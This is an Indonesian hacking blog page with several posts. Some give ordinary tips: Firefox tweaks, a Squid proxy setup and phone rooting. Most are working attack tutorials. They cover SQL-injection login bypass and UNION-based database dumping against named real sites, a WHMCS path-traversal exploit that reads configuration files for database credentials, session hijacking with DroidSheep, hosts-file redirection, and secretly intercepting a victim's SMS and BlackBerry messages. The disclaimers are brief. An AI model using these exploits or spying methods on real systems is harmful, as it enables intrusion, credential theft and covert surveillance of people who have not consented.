Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts

Hacking WPA / WPA2 Dalam 1 Menit

Hacking WPA / WPA2 Dalam 1 Menit

Cara yang cukup ampuh untuk menembus keamanan wireless WPA/WPA2 dalam waktu kurang lebih 1 menit. Langsung saja kita tonton videonya di bawah ini :




Bagi yang ingin berkomentar silakan menuju ke http://www.facebook.com/photo.php?v=351316854930863

By Irwan Prakoso

Mempercepat Koneksi Internet "Speed Firefox"


Dalam artikel ini saya akan menjelaskan cara atau langkah untuk Mempercepat Koneksi Internet "Speed Firefox" pada komputer Anda,seperti biasa saya tak akan berbelit-belit dan ngomong terlalu panjang lebar,
Silahkan Anda ikuti langkah-langkah yang saya posting di bawah ini.

 Langkah Mempercepat Koneksi Internet "Speed Firefox" :

  • Aktifkan browser Firefox-3.0 Anda dan ketikkan perintah “about:config” (tanpa tanda kutip), di address barnya.
  • Anda akan dibawa ke halaman konfigurasi Firefox-3.0. Kalau ada peringatan untuk hati-hati mengubah pengaturan pada halaman tersebut, klik yes atau ok saja.
  • Pada filter search bar di halaman konfigurasi, ketikkan “network.http.pipelining”. Pastikan valuenya sudah diset dengan nilai “true”. Jika masih “false”, klik ganda untuk menjadikannya “true”.
  • Kembali ke filter search bar, ketikkan “network.http.pipelining.maxrequests”. Double klik pada opsi ini dan rubah nilainya (value) menjadi 8.
  • Kembali ke filter search bar, ketikkan “network.http.proxy.pipelining”, double klik untuk merubah valuenya menjadi ‘true’.
  • Kembali ke filter search bar, ketikkan “network.dns.disableIPv6?. Double klik untuk merubah nilainya menjadi ‘true’.
  • Klik kanan di halaman konfigurasi tersebut dimanapun terserah, pilih new –>boolean. Ketikkan “content.interrupt.parsing”pada popup windows yang muncul kemudian klik OK. Ketika prompt untuk pilihan muncul, pilih ‘true’.
  • Kembali klik kanan halaman konfigurasi, pilih new –> integer. Ketikkan “content.max.tokenizing.time”. Pada prompt value yang muncul masukkan nilai 2250000.
  • Kembali klik kanan halaman konfigurasi, pilih new –> integer. Ketikkan “content.notify.interval”. Masukkan nilai 750000 pada prompt value yang muncul.
  • Kembali klik kanan halaman konfigurasi, pilih new –> boolean. Ketikkan “content.notify.ontimer”. Pilih ‘true’ untuk isian prompt value yang muncul.
  • Kembali klik kanan halaman konfigurasi, pilih new –> integer. Ketikkan “content.notify.backoffcount”. Pada prompt value yang muncul isikan value ‘5'.
  • Kembali klik kanan halaman konfigurasi, pilih new –> integer. Ketikkan “content.switch.threshold”. Isikan nilai 750000 pada prompt integer value yang muncul.
  • Terakhir, kembali klik kanan pada halaman konfigurasi, pilih new –>integer. Ketikkan “nglayout.initialpaint.delay”. Isikan nilai ‘0' pada prompt isian nilai yang muncul. 
  •  
Sekian artikel dari saya semoga bermanfaat !!


Magic4rt Blog | Angga Tri Kusuma

Cara Menghemat Quota Internet

Pada koneksi ber-quota terbatas seperti Indosat 3G Broadband, Indosat M2, dan Telkomsel Flash, mobi, tentunya sangat menjengkelkan jika tiba-tiba quota kita habis. Resikonya untuk beberapa paket akan turun drastis, dan beberapa paket lainnya akan sama sekali tidak bisa digunakan. Contohnya seperti yang saya  pakai, Indosat Broadband Eco, jika quota habis akan turun drastis menjadi 64kbps, atau setara dengan koneksi GPRS.

Ada beberapa cara untuk menghemat jatah quota internet kita, diantaranya adalah dengan meminimalkan content untuk browsing (ex: disable images), menggunakan compression proxy (toonel, onspeed, dll), dan menggunakan cache proxy.

Pada koneksi ber-quota terbatas seperti Indosat 3G Broadband, Indosat M2, dan Telkomsel Flash, tentunya sangat menjengkelkan jika tiba-tiba quota kita habis. Resikonya untuk beberapa paket akan turun drastis, dan beberapa paket lainnya akan sama sekali tidak bisa digunakan.

nah... disini saya akan membahas penghematan bandwidth dengan cache proxy menggunakan Squid 2.7.STABLE5. (sudah saya test di os vista) .
Dengan cache proxy, pada situs-situs yang sering kita kunjungi, content yang harus didownload dan mengurangi jatah quota kita akan lebih sedikit. Karena content-content tersebut akan tersimpan dahulu di cache proxy kita. Jadi secara tidak langsung, jika kita mengunjungi situs tersebut berulang kali, sama saja kita mendownload content dari komputer yang terinstall proxy kita. Kesimpulannya.. lebih cepat dan lebih ngirit bandwidth.
Lanjut???

Download dulu Squid Proxy 2.7 Stable5 untuk Windows di SINI

Extract file tersebut di partisi mana saja.. terserah, dimana saja boleh. Untuk mempermudah langkah-langkah instalasinya, bisa disamakan dengan saya, atau extract di “C:\squid\
Setelah semua ter-extract, masuk ke folder “C:\squid\etc\“. Disana terdapat file-file konfigurasi squid :

- cachemgr.conf.default
- mime.conf.default
- squid.conf.default
- squid_radius_auth.conf.default

Kemudian rename keempat file tersebut dengan menghilangkan tulisan “.default“. Sehingga menjadi:

- cachemgr.conf
- mime.conf
- squid.conf
- squid_radius_auth.conf

Setelah selesai me-rename keempat file tersebut, kemudian buka file “squid.conf” dengan notepad atau bisa juga dengan (EditPlus, Ultra Edit, Notepad ++, dan lain-lain).
Cari tulisan (CTRL+F) “TAG: http_port“, kemudian cek apakah di bawah tulisan “# Squid normally listens to port 3128” sudah ada tulisan “http_port 3128” atau belum, jika belum tambahkan tulisan “http_port 3128” di bawah tulisan “# Squid normally listens to port 3128“.
Sehingga menjadi seperti di bawah ini

# TAG: http_port
# Usage: port [options]
# hostname: port [options]
# 1.2.3.4: port [options]
# If you run Squid on a dual-homed machine with an internal
# and an external interface we recommend you to specify the
# internal address: port in http_port. This way Squid will only be
# visible on the internal address.
#
# Squid normally listens to port 3128
http_port 3128

Cari tulisan (CTRL+F) “TAG: visible_hostname“, kemudian cek apakah di bawah tulisan “# none” sudah ada tulisan “visible_hostname localhost” atau belum. Jika belum, tambahkan tulisan “visible_hostname localhost” di bawah tulisan “# none“.
Sehingga menjadi  seperti di bawah ini

# TAG: visible_hostname
# If you want to present a special hostname in error messages, etc,
# define this. Otherwise, the return value of gethostname()
# will be used. If you have multiple caches in a cluster and
# get errors about IP-forwarding you must set them to have individual
# names with this setting.
#
#Default:
# none
visible_hostname localhost

Cari tulisan (CTRL+F) “http_access allow localnet“, kemudian cek apakah dibawah tulisan “http_access allow localnet” sudah terdapat tulisan “http_access allow localhost” atau belum. Jika belum tambahkan tulisan “http_access allow localhost” di bawah tulisan “http_access allow localnet“.
Sehingga menjadi seperti di bawah ini

# Example rule allowing access from your local networks.
# Adapt localnet in the ACL section to list your (internal) IP networks
# from where browsing should be allowed
http_access allow localnet
http_access allow localhost

Cari tulisan (CTRL+F) “TAG: dns_nameservers“, kemudian dibawahnya pada tulisan “dns_nameservers“, isi value dns dengan dns ISP nya masing-masing, atau dengan DNS yang biasanya anda gunakan. Sehingga formatnya menjadi “dns_nameservers [primary DNS] [secondary DNS]“. Contohnya ditempat saya menggunakan OpenDNS dan speedy, sehingga menjadi “dns_nameservers 208.67.220.220 202.134.0.155“.
Sehingga menjadi seperti di bawah ini

# TAG: dns_nameservers
# Use this if you want to specify a list of DNS name servers
# (IP addresses) to use instead of those given in your
# /etc/resolv.conf file.
# On Windows platforms, if no value is specified here or in
# the /etc/resolv.conf file, the list of DNS name servers are
# taken from the Windows registry, both static and dynamic DHCP
# configurations are supported.
#
# Example: dns_nameservers 10.0.0.1 192.172.0.4
#
#Default:
# none
dns_nameservers 208.67.220.220 202.134.0.155

Selesai !!!!!

# Simpan (CTRL+S) “squid.conf” yang baru saja kita edit tadi.
# Buka “Command Prompt“, kemudian masuk ke directory “squid” tadi melalui “Command Prompt”. Contohnya adalah dengan mengetik “cd C:\squid\sbin\“.

C:\>cd c:\squid\sbin\
C:\squid\sbin>

Setelah masuk ke directory “cd C:\squid\sbin\” melalui command prompt, kemudian ketik “squid -z“.

C:\squid\sbin>squid -z
2008/11/18 08:45:20| Creating Swap Directories
C:\squid\sbin>

Masih di “command prompt”, ketik “squid -d l -D“, kemudian tekan CTRL+C“. 

C:\squid\sbin>squid -d l -D
2008/11/18 08:46:17| Starting Squid Cache version 2.7.STABLE5 for i686-pc-winnt.
..
2008/11/18 08:46:17| Running on Windows XP
C:\squid\sbin>

Masih di “command prompt”, ketik “squid -i

C:\squid\sbin>squid -i
Registry stored HKLM\SOFTWARE\GNU\Squid\2.6\Squid\ConfigFile value c:/squid/etc/
squid.conf
Squid Cache version 2.7.STABLE5 for i686-pc-winnt
installed successfully as Squid Windows System Service.
To run, start it from the Services Applet of Control Panel.
Don’t forget to edit squid.conf before starting it.
C:\squid\sbin>

Dan yang terakhir (masih di command prompt), ketik “squid -O -D

C:\squid\sbin>squid -O -D
Registry stored HKLM\SOFTWARE\GNU\Squid\2.6\Squid\CommandLine value -D
C:\squid\sbin>

Untuk menghidupkan proxy, masuk ke “Control Panel” -> “Administrative Tools” -> “Services“. Kemudian cari nama services “squid” -> “Klik kanan” -> “Start“
Arahkan proxy pada browser anda ke alamat “localhost” dengan port “3128“.
Seperti gambar di bawah ini

Cara Menghemat Quota Internet
Anda juga bisa menghapus services squid tersebut dengan cara mengetikkan perintah “squid -r -n squid” di Command Prompt.

C:\squid\sbin>squid -r -n squid
Service squid deleted successfully.

DNS Host URL File Hacking

Pernah kebayang gak saat kita mau buka website A tiba2 yang muncul malah website B, tapi anehnya Url nya adalah alamat website A ? wah…pikiran kita pasti langsung ke virus atau spyware, belum tentu, bisa aja ada seseorang yang iseng <baca:hacker> telah menyusup ke system kita dan merubah file host untuk di arahkan ke Url yang dia kehendaki
Terus Gimana caranya ? cekicrot….
1. Buka cmd kamu dengan cara masuk menu run→cmd trus enter
2. Kalau udah masuk ketikkan
cd\windows\system32\drivers\etc
Seperti gambar di bawah ini :
Photobucket
3.  Cek dulu isi file hosts nya dengan perintah type hosts maka akan muncul seperti gambar dibawah ini
Photobucket
4. Muncul kan isi dari file hosts, terus gimana cara ngrubahnya ? gini caranya…ping dulu alamat yang mau dijadikan pengubah url target. Disini saya ambil contoh : www.kompas.co.id
Photobucket
5.  Nah, dapetkan IP nya.  tinggal nentuin sasarannya, website sasaran saya adalah www.jasaraharja.co.id, kalian boleh website apa aja.
6. jadi perintahnya adalah :
echo 202.146.4.100 www.jasaraharja.co.id >> hosts
trus enter deh.
Photobucket
7. Coba cek lagi di hosts nya tadi dengan perintah type hosts dah muncul kan perubahan
yang kita lakukan tadi…
Photobucket
8.  Buat nge-cek hasilnya,buka browser kamu dan coba browse ke www.jasaraharja.co.id
Pasti berubah tampilannya ke kompas.com, kaya ini nih..
Photobucket
Gak sulit kan membuat halaman website redirect ke halaman lain, hanya bermodalkan CMD
Selamat Mencoba !

Sumber : http://www.binushacker.net/dns-host-url-file-hacking.html

Sadap HP Blackberry dan Android


Sebelumnya Cyber4rt sudah berbagi cara untuk menyadap SMS dari HP orang lain ke HP kamu sendiri. Dan sekarang, saya akan berbagi cara untuk sadap BBM untuk kamu para pengguna BB. Ini khusus untuk BB asli bukan BB cina punya. Ok, langsung saja kamu perhatikan langkah-langkah berikut ini.

1. Siapkan BB korban untuk dilakukan instalasi aplikasi sadap BBM

2. Silahkan kamu login ke situs DEREX.COM, silahkan kamu daftar dengan cara mengisi nama, email, password, pilih Message Plan Dexrex Free.

3. Setelah itu kamu akan mendapat 2 pilihan untuk memilih. Lihat pada gambar.

4. Jika kamu pengguna BB, maka pilih BLACKBERRY dan jika Android, kamu pilih ANDROID. Setelah itu akan ada verifikasi email dan kamu akan diberi link untuk download aplikasinya. Lihat pada gambar.


5. Selanjutnya, pada halaman tersebut kamu akan mendapatkan instruksi cara penginstalan aplikasi tersebut pada gadget kamu.

6. Setelah instalasi selesai, maka aplikasi sudah dapat berjalan di BB korban dan jika di close aplikasi tetap berjalan dan melakukan connect server automatis.
Perhatian..! Cara ini digunakan untuk hal yang penting saja.

OK, Selamat mencoba.

Sadap SMS di Handphone Biasa


Sekarang sudah ada cara sadap/mengalihkan panggilan, sms, telepon, pembicaraan private bahkan BBM juga bisa disadap. Kalau kamu ingin tahu cara menyadap dengan cara mudah, kamu cukup punya handphone biasa saja. Dengan handphone biasa ini, kamu dapat menyadap sms orang lain tanpa aplikasi apa pun yang diinstal. Langsung saja, saya berbagi trik sadap sms dengan menggunakan trik operator selular.

Sadap SMS di Handphone Biasa


Bagi kamu para pengguna operator selular XL, kamu sangat beruntung. Karena dengan menggunakan operator ini, kamu dapat melakukan penyadapan secara sederhana. Dan kamu dapat membaca petunjuk berikut ini.
1. Siapkan gadget orang yang ingin kamu sadap. ( Agak dirayu dikit untuk mendapatkan gadgetnya )

2. Ketik *123*571# di gadget korban, lalu kamu tekan CALL.

3. Setelah itu kamu akan mendapat beberapa pilihan, jadi kamu pilih no 2 ( Layanan Lain )

4. Dari pilihan tadi, akan muncul 2 pilihan baru, yaitu :
  • AUTO FORWARD => Menerima SMS orang lain langsung tanpa masuk ke no HP korban.
  • AUTO COPY => Menerima SMS orang lain yang masuk ke no HP korban dan juga ke no HP kamu sendiri.

5. Setelah itu, kamu pilih yang AUTO COPY, agar kamu dapat mengetahui lebih detail lagi tanpa ketahuan. Dan kemudian, kamu tungggu konfirmasi dari operator XL untuk pemotongan biaya ( 1000/ bulan )

6. Lalu kamu mengirim sms dari HP korban dengan format : COPY ON lalu kirim ke no HP kamu. Maka proses sadap SMS sudah berhasil.

OK, Selamat mencoba.

http://life.xl.co.id/layanan/index.do

Download Aplikasi Android Market / Play Store Dengan PC


Saat ini kita dapat menggunakan komputer untuk mengunduh aplikasi dari google play store dengan media PC atau Laptop anda. Bagaimanakah caranya? Mari kita bahas bagaimana cara mengunduh aplikasi di google play store dengan media PC atau Laptop.

Langkah yang harus anda tempuh:
1.Jika anda menggunakan google chrome v17 (dapat anda lihat di menu opsi yang terletak di kanan atas tepatnya dibawah tombol close, setelah itu pilih "tentang google chrome"), anda dapat melewati langkah pertama ini, namun jika anda mempunyai versi dibawah atau blom mempunyai google chrome anda dapat download dan install google chrome terlebih dahulu, anda bisa mendapatkannya di sini. (Kenapa menggunakan google chrome? Karena aplikasi downloader itu menggunakan plug in dari google chrome)
2.Download APK Downloader di sini. Lalu tarik dan arahkan ke halaman web google chrome. Nanti akan ada konfirmasi penginstalan exstention.
3.Tutup google chrome yang telah anda pasang plug in / add on tersebut.
4.Kemudian klik kanan icon google chrome pada desktop anda, masuklah pada opsi properties, setelah itu tambahkan kode:
--ignore-certificate-errors
sebagai contoh penambahan kode:
C:\…\chrome.exe --ignore-certificate-errors
atau
“C:\…\chrome.exe” –ignore-certificate-errors
5.Tutup kembali google chrome, kemudian buka kembali dan masuk pada google play store
6.Klik icon gambar android pada kolom sebelah URL address (bergambar logo android)
7.Maka akan muncul sebuah kotak yang berisikan peringatan dimana anda harus mengisikan alamat email yang digunakan pada android device anda (play store anda) dan Device ID
8.Isikan email dan Device ID (semacam serial number) dari ponsel android yang anda punya, karena itu install aplikasi device id di ponsel android anda. Untuk mengetahui device ID anda, anda ketikkan  *#*#8255#*#*. Contoh android-1234567890abcdef maka ID device anda adalah 1234567890abcdef
Atau anda dapat juga mengetahuinya dengan download aplikasinya di sini. Buka aplikasi device id di ponsel dan kamu akan mendapatkan alamat email dan device id. Copy dan Paste data tersebut.
9.Setelah langkah memasukan Device ID dan email, anda buka aplikasi yang hendak anda unduh di google play store, setelah halaman pada web terbuka sempurana, anda klik gambar android pada kanan atas sebelah URL address tersebut.
10.Aplikasi telah terunduh dan anda dapat memindahkannya ke android device anda.
Catatan: Jika anda binggung, anda dapat melihat langsung pada official web di sini.

Mempercepat Koneksi Internet Flash

Bagi Anda yang menggunakan Koneksi Internet Flash, Artikel ini mungkin
akan sedikit membantu Anda dalam masalah kecepatan koneksi, kenapa 
saya katakan mungkin? karena dalam langkah yang akan saya posting tidak
selalu berhasil, tapi tidak ada salahnya kalo Anda terlebih dahulu mencobanya,
" Lebih Baik Mencoba Daripada Tidak Melakukan Apapun Sama Sekali " 
 
Berikut langkah mempercepat koneksi internet Flash :
  • Klik kanan pada My Computer
  • Klik Properties
  • Klik Hardware
  • Klik Device Manager
  • Pilih Modem
  • Klik kanan pada Modem
  • Pilih jenis Modem & klik propertie
  • Pada properties pilih Advenced & Masukan Extra Setting di bawah ini :
Extra Command Setting :
  1. Untuk Telkomsel Flash Time Based : at+cgdcont=1,"IP","flash"
  2. Untuk Telkomsel Volume / Flash Unlimited : at+cgdcont=1,"IP","internet"
  3. Untuk Telkomsel Volume / Flash Unlimited : at+cgdcont=1,"IP","telkomsel"
  • Copy Paste sesuai milik Anda
  • Pilih salah satu saja
  • Selesai

    Bypass Intranet Pro (Tutorial)

    Selamat pagi.
    Ini adalah posting pertama saya di Cyber4rt.
    Kali ini saya ingin share, cara bypass intranet pro.
    Caranya cukup sederhana.

    Alat :
    1. Browser Masing - Masing.
    2. Sedikit pengetahuan tentang dork google.

    Sebelumnya thanks to [Microsoft-Dz]
    yang udah berbaik hati mau share cara ini

    How To :
    1. Buka Google di browser masing - masing.

    2. Ketik teks dibawah ini untuk dork :
    intext:Service proposé par Intranet-Pro.com
     
    3.Cari website yang benar2 rentan akan adminnya...
    Contoh disini, saya menemukan bug di:
    www.xxx.fr/admin/
     
    4. Login dengan :
    Login: 1'or'1
    Password: 1'or'1
    seperti ini hasilnya :
     
    Bypass Intranet Pro (Tutorial) 

    Untuk contoh websitenya :
    genetic-distribution.com/admin/
    www.portail-plus.fr/js/admin/
    http://www.tvhdm.com/admin/ 
     
    NOTE : cara ini hanya untuk pembelajaran, jangan disalahgunakan.
    thanks :)
    Sumber : http://1337day.com/exploits/18082

    Akses Akun Orang Lain Dengan Droidsheep

    DroidSheep adalah dengan sebuah software Android yang berfungsi “mengawasi” network traffic dan kemudian memperoleh akses akun online. Ini berarti pengguna Android yang menjalankan DroidSheep dapat menggunakan akun korban, mendapatkan akses ke situs yang tidak menggunakan koneksi SSL aman dan terenkripsi (HTTPS). DroidSheep adalah aplikasi hijacking yang membutuhkan rooting Android.

    Metode kerja DroidSheep adalah melalui cookie, yang biasa disebut HTTP session hijacking (atau kadang "sidejacking"), adalah ketika hacker membobol dan menguasai cookie orang lain, memungkinkan hacker untuk mengakses akun Facebook orang lain dan bebas melakukan apapun. Ditambah pada pada jaringan hotspot WiFi, cookies pada dasarnya on-the-air, membuat lebih mudah untuk dibobol. Metode ini telah banyak diketahui dan digunakan di kalangan hacker. Bagi Anda yang masih awam tentang HTTP session hijacking, berikut penjelasannya :
    Budi adalah seseorang yang terkenal dengan aktivitas rutin setiap pagi pergi ke coffee shop dan menggunakan laptopnya untuk berselancar internet melalui layanan WiFi gratis dan cepat di coffee shop tersebut. Semua email kerja dan kegiatan media sosial dilakukannya melalui WiFi coffee shop.

    Andi adalah hacker pengguna Android yang juga memanfaatkan layanan WiFi di coffee shop yang sama dengan Budi. Dengan aplikasi DroidSheep, terinstal dan aktif, Andi bisa melakukan pengiriman email, menghapus teman, bahkan menghapus akun online milik Budi tanpa diketahui oleh Budi atau siapapun.
    Bagaimana ini bisa terjadi?
    Ketika Budi menggunakan WiFi, laptopnya mengirim data yang ditujukan kepada situs akun online miliknya. Karena ia menggunakan WiFi, data yang dikirim tersebut akan terkirim “over the air” melalui router WiFi coffee shop, dan sistem “over the air” inilah cara hack password menjadi lebih mudah.
    Lihat langsung cara penggunaan Droidsheep pada video di bawah ini :


    DroidSheep sangat mudah digunakan. Cukup dengan akses DroidSheep, klik tombol START dan tunggu hingga seseorang mengakses akun online suatu situs yang kebanyakan didukung oleh DroidSheep. Setelah akun online tersebut terbaca dan berada pada list DroidSheep, Anda tinggal klik dan vioila! Cara hack password menggunakan Droidsheep dengan mudah telah dilakukan.

    Sebenarnya DroidSheep bukan untuk digunakan hack akun online orang lain. Aplikasi ini sengaja didesain untuk memberikan demonstrasi seberapa rentan masalah keamanan situs atas tindakan HTTP session hijacking dan terbukti efektif, situs-situs seperti Facebook, Yahoo, Google, dan beberapa jejaring sosial populer sudah mengatasi rentannya masalah keamanan ini. Dan juga sebagai pengingat kepada pengguna bahwa siapapun bisa mencuri data pribadi akun online Anda, oleh karena itu pengetahuan ekstra untuk melindungi diri saat berselancar di internet sangat dibutuhkan.

    Droidsheep minggu lalu masih tersedia di Android Market saat Paseban melakukan percobaan pada aplikasi cara hack password ini. Namun minggu ini aplikasi gratisan ini telah dihapus dari Android market.
    Sebelum mempraktekkan, saya peringatkan, semua yang anda lakukan adalah tanggung jawab anda dan gunakanlah dengan bijak sebagai media pengetahuan dan pembelajaran saja.

    Nah, apa saja yang Anda butuhkan ?
    1. Smartphone Android versi 2.1 keatas yang sudah di rooting. Karena aplikasi ini membutuhkan izin dari superuser.
    2. Download DroidSheep di sini
    3. Jaringan Nirkabel/Wifi (bisa dicoba dikampusatau warkop)
    4. Hubungkan HH anda dengan wifi.
    5. Install DroidSheep dan jalankan, nanti akan bermunculan akun-akun / web session yang berhasil ditangkap


       
    6. Lalu pilih salah satu list, pilih OPEN SITE, dan hasilnya selamat anda sedang menggunakan akun yang berhasil di hijack.

       
    Untuk keamanan bagi anda pengguna android, anda dapat menangkal Droidsheep dengan menggunakan Droidsheep Guard. Sedangkan untuk keamanan para pengguna WiFi, sebaiknya anda menggunakan https di setiap browsing yang anda lakukan terutama pada akun - akun pribadi Anda

    Itulah sedikit tulisan mengenai Cara Akses Akun Orang Lain Dengan Droidsheep serta cara mengatasi / menghindarinya. Semoga bermanfaat

    Tutorial SQLi Injection Dengan Schemafuzz

    Assallamualaikum Wr Wb,
    Salam sejahtera,
    Pada kesempatan kali ini saya akan berbagi tutorial singkat SQLi menggunakan schemafuzz.py.
    Oke langsung saja, langkah pertama download schemafuzz DISINI. Langkah berikutnya install python, jika belum ada bisa di download DISINI. Jika python sudah terinstal, langsung jalankan di cmd. Untuk mempermudah silahkan rename schemafuzz.py menjadi root.py dan simpan di Direktori C.
    • Siapkan target, disini saya menggunakan "http://www.perfectpotion.net.cn/article.php?id=36"
    • Buka cmd, ketikkan perintah "cd c:\" lalu "dir" anpa tanda kutip.
    • Kemudian cari jumlah column degnan mengetikan perintah dibawah tanpa tanda kutip, (Lihat Gambar).

      "root.py --findcol -u http://www.perfectpotion.net.cn/article.php?id=36"


      Maka hasilnya akan tampak seperti gambar dibawah :

      Tutorial Schemafuzz
    • Dari gambar di atas bisa kita lihat bahwa jumlah column adalah 20, null column pada column ke-1. Seperti di SQLi manual, column 1 adalah angka ajaib.
    • Langkah selanjutnya mencari nama database. Ketikkan perintah : root.py --dbs -u (darkc0de URL)

      "root.py --dbs -u http://www.perfectpotion.net.cn/article.php?id=36+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19"

      Lihat hasilnya :

      Tutorial SchemafuzzDari gambar di atas sudah terlihat nama database yaitu "yf".
    • Untuk melihat table dan column, kita ketikkan perintah "root.py --schema -u (darkc0de URL) -D (database name)

      "root.py --schema -u http://www.perfectpotion.net.cn/article.php?id=36+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -D yf"

      Tutorial SchemafuzzMaka hasilnya akan tampak dalam gambar berikut :

      Tutorial Schemafuzz
    • Dari gambar di atas sudah terlihat jelas nama table dan column, untuk melihat data dalam column ketikkan perintah "root.py --dump -u (darkc0de URL) -D (database name) -T (table name) -C (column name)

      *Untuk menghindari error dalam pembacaan data, saya hanya akan mengambil data di table "admin" dan column "ID,AdminName,AdminPass" saja.

      "root.py --dump -u http://www.perfectpotion.net.cn/article.php?id=36+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 -D yf -T admin -C ID,AdminName,AdminPass"

    Maaf, hasilnya tidak akan saya post disini... :D
    Mudah-mudahan bermanfaat,
    Wassalam,

    How To Hack WHMCS

    WHMCS adalah suatu script yang sekarang paling dipakai oleh banyak kalangan webhoster karena dengan memanage yang mudah. WHMCS juga adalah sebuah billing yang berfungsi untuk pembuatan account hosting,reseller,vps maupun dedicated.

    WHMCS bisa dikatakan billing paling bagus untuk saat ini dan bisa dikatakan billing nomor 1, WHMCS melebihi billing2 yang lain seperti ModernBill,AcountLab ++ dan lainnya. fitur WHMCS juga boleh dikatakan hampir komplit untuk urusan memanaged hosting, anda akan di manjakan dengan BILLING WHMCS ini

    Exploit Powered by whmcs

    #Keyword Dork :

    1. inurl:whmcs/cart.php?a=
    2. inurl:billing/cart.php?a=

    #Injector :

    cart.php?a=test&templatefile=../../../configuration.php

    #Contoh [sudah di patch] :

    http://www.7m2.net/whmcs/cart.php?

    #Tambahkan Injector di belakang cart.php? sehingga menjadi :

    http://target.com/whmcs/cart.php?a=test&templatefile=../../../configuration.php

    How To Hack WHMCS

    #Selanjutnya klik kanan > View page source

    How To Hack WHMCS

    #Cari tulisan yang berwarna hijau seperti gambar di bawah ini :

    How To Hack WHMCS

    #Selanjutnya kalian tinggal login di halaman PHPMyAdmin, contoh :

    http://www.7m2.net/phpmyadmin

    Selesai.

    Tutorial ini hanya sebagai pembelajaran saja dan tidak bertujuan untuk merusak system milik siapapun. Dan juga sebagai peringatan kepada Admin WHMCS untuk segera melakukan patch untuk menghindari hal - hal yang tidak diinginkan.

    Cara Mudah Rooting Sony Ericsson Xperia Play (Tanpa Unlock Bootloader)

    NB: Saya menggunakan ROM General UK, saya belum test apakah cara ini juga berlaku untuk 2.3.2 bawaan Xperia Play Indonesia. Saya tidak bertanggung jawab atas kerusakan baik Hardware/Software yang terjadi yang membuat garansi anda hilang

    Cara Mudah Rooting Sony Ericsson Xperia Play (Tanpa Unlock Bootloader)

    Sialnya saya keburu update Xperia Play saya ke 2.3.3... Harusnya pas masih 2.3.2 saya root menggunakan Gingerbreak 1.2, karena dari yg saya baca Root di 2.3.2 akan terbawa di 2.3.3 dengan OTA update... Selanjutnya saya berhasil juga nge-root Xperia Play saya menggunakan cara2 dengan referensi dari http://forum.xda-developers.com/show...php?t=1116090:
    Tutorial Downgrade ke 2.3.2
    1. Download Flashtool 0.2.9 di http://forum.xda-developers.com/show....php?t=1000012, extract filenya. Kalau saya di c:\flashtool.
    2. Download ROM Xperia Play 2.3.2 versi UK http://www.multiupload.com/MDS10FFGTT, extract filenya di folder flashtool\firmware (jangan sampai salah ya... karena tadi malam saya salah download punya ARC dan Xplay saya sempat nge-brick-- deg degan nya tidak menyenangkan sekali).
    3. Download Gingerbreak v 1.2 http://forum.xda-developers.com/show....php?t=1044765
    4. Downgrade Xperia Play dengan flash tool dengan Image ROM pada nomor 2, click flash,hapus tanda centang wipe userdata.
    5. Ikuti instruksi yang muncul.
    Root dengan Gingerbreak
    1. Boot Xperia Play.
    2. Install Gingerbreak yang telah didownload melalui file explorer seperti Astro, ES atau Root Explorer.
    3. Aktifkan: Setting-Applications Setting-Development-USB Debugging.
    4. Pastikan MicroSD terpasang.
    5. Aktifkan Gingerbreak - Root Device. Tunggu beberapa saat,
    6. Setelah reboot dan Superuser. Update Xperia anda menggunakan OTA (About Phone-Software Update-Update Now). Saya menggunakan Wifi Fastnet 1 Mbps dan saya memerlukan update sebesar 51 MB. Karena saya mulainya dari ROM UK, saya belum tahu apakah update via SEUS juga akan memberikan hasil yg sama.
    Kenapa saya menggunakan cara ini?
    1. Bootloader tetap Locked, masih bisa OTA. ReLock Bootloader lebih ribet prosesnya. Jadi garansi tidak hangus.
    2. Gingerbreak memberikan menu Unroot (nggak tau deh bisa aktif atau nggak). Suatu saat mungkin saya butuh claim garansi, sehingga device bisa dikembalikan dalam kondisi tanpa Root.
    3. Dengan root saya bisa SetCPU untuk underclock min frequency, Titanium Backup, dan membuang bloatware Xperia Play yang tidak saya butuhkan. Walaupun belum tahu juga language keyboard itu ada dimana.
    Sumber : http://www.kaskus.us/showpost.php?p=485561477&postcount=357

    Tutorial SQL Injection Step by Step [ Dummies ]

    Sebelum men daface sebuah situs, kita bisa menggunakan "dork Sql Injection" dengan bantuan om kita semua ( om google )
    Code:

    inurl:"product.php?id=" & intext:"You have an error in your SQL syntax"

    trus yg saya dapat :
    Code:
    http://www.victim.com/detailproduct.php?id=75

    untuk mengecek bug pada suatu web tambahkan single quote ( ' ) dibelakang url
    Code:
    http://www.victim.com/detailproduct.php?id=75'


    ternyata ada bug-nya, muncul pesan error :
    Code:

    You have an error in your SQL syntax; check the manual that corresponds to your
    MySQL server version for the right syntax to use near '\' and b.id=a.cat' at line 1


    Untuk mencari column gunakan perintah [ order by ]
    Code:
    http://www.victim.com/detailproduct.php?id=75 order by 1--

    dimulai dengan angka 1, selanjutnya 2, dst sampai muncul pesan error

    pada target kita kali ini, error muncul pada angka 19
    Code:
    http://www.victim.com/detailproduct.php?id=75 order by 19--

    muncul pesan error:
    Unknown column '19' in 'order clause'

    jadi angka yang diambil adalah 19-1 = 18 (jumlah column adalah 18)

    Selanjutnya kita akan mencari "angka ajaib" dimana kita bisa melakukan injection dengan perintah "union all select"
    Code:
    http://www.victim.com/detailproduct.php?id=-75 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--

    Jangan lupa tambahkan tanda kurang ( - ) didepan angka parameter ID 75

    akan muncul "angka ajaib" : 3, 11 dan 18
    kita pilih salah satunya saja, misal 3

    trus kita cari versi Database MySql-nya dengan perintah [version()] atau [@@version] pada angka 3
    Code:
    http://www.victim.com/detailproduct.php?id=-75 union all select
    1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--


    muncul tulisan :
    5.0.90-community

    wewww...ternyata versi 5, klo versi 4 sy angkat tangan.....
    nb : lebih mudah versi 5, karena sebentar kita akan mencari informasi table dan column dari information_schema, dimana information_schema tidak terdapat pada database MySql versi 4. Jadi kalau targetnya mempunyai database MySQL versi 4, yang kita lakukan yaitu menebak-nebak tablenya... lol

    Selanjutnya kita akan mencari table-nya dgn perintah "group_concat(table_name)" pada salah satu angka ajaib
